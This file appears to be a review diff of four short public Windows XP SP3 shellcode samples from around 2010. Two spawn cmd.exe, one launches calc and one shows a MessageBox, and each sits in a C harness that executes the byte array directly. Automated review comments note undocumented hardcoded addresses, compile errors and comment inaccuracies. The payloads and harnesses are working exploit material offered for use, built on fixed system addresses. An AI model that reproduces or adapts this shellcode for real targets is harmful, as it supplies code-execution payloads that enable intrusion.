# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 52 bytes
# Proof : http://img59.imageshack.us/img59/6499/proofc.png
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Date : 15/09/2010
# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Temenni : Yeni Anayasamiz Hayirli Olsun
# Lakirdi : I dont know very well assembly. but, I know I will learn its too :P
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x12\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x6d\x64\x2e\x65\x78"
"\x65";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
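
Review bot: Nothing in the file explains the payload bytes: the trailing data decodes to "cmd.exe /c cmd.exe" and the two `\xbb ... \xff\xd3` sequences call absolute addresses 0x7c8623ad and 0x7c81cafa, none of which is documented. Add a commented disassembly and name the function and OS build each address assumes. The header lines beginning with `#` also need to go inside a C comment before `#include <stdio.h>`, or the file will not compile.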

@ -0,0 +1,51 @@
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################### 1
0 I'm ZoRLu member from Inj3ct0r Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
# Title : win32/xp sp3 (Tr) cmd.exe Shellcode 42 bytes
# Proof : http://img36.imageshack.us/img36/1183/cmdm.jpg
# Plat. : win32 / windows
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 01/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : Okudugumuz icin Cezalandiran Sistemin amina koyim / Kpss Anani ...
# Lakirdi : Son 31 Gun
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\x31\xc0\xeb\x13\x5b\x88\x43\x0e\x53\xbb\xad\x23\x86\x7c\xff\xd3\xbb"
"\xfa\xca\x81\x7c\xff\xd3\xe8\xe8\xff\xff\xff\x63\x6d\x64\x2e\x65\x78"
"\x65\x20\x2f\x63\x20\x63\x6d\x64";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
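
Review bot: The ASCII-art banner and the `#` header lines precede `#include <stdio.h>` as plain text, so this is not a valid C translation unit; move the metadata into one `/* ... */` block and drop the banner, which carries no technical information. The title gives 42 bytes, which matches the literal, but the harness reports it with `strlen` passed to `%d`; `sizeof(shellcode) - 1` with `%zu` is the correct form.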

@ -0,0 +1,24 @@
/*------------------------------------------------------------------------
Title...................Windows XP SP3 EN Calc Shellcode 16 Bytes
Release Date............12/7/2010
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------*/
int main(int argc, char *argv[])
{
char shellcode[] =
"\x31\xC9" // xor ecx,ecx
"\x51" // push ecx
"\x68\x63\x61\x6C\x63" // push 0x636c6163
"\x54" // push dword ptr esp
"\xB8\xC7\x93\xC2\x77" // mov eax,0x77c293c7
"\xFF\xD0"; // call eax
((void(*)())shellcode)();
return 0;
}
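
Review bot: The comment on `"\x54"` reads "push dword ptr esp", which describes a memory operand; opcode 0x54 is `push esp`, so the comment should say that. `mov eax,0x77c293c7` loads an absolute address without saying which function it is expected to be; the header lists "Windows XP SP3 EN" as the tested system, so add the module and export name next to the address.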

@ -0,0 +1,19 @@
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( run MessageBox that show an error message )
website : Www.AttackerZ.ir
spt : All firends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
int main(int argc, char **argv)
{
((void (*)())code)();
return 0;
}
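
Review bot: `\xe8\xbe\xe9\x44\x7d` is a relative `call` (opcode 0xE8 with a 32-bit displacement), so the address it reaches depends on where `code` is placed in memory, and the header states neither the intended target nor the load address it assumes. Document both, and remove the `<stdio.h>`, `<string.h>` and `<stdlib.h>` includes, none of which is used.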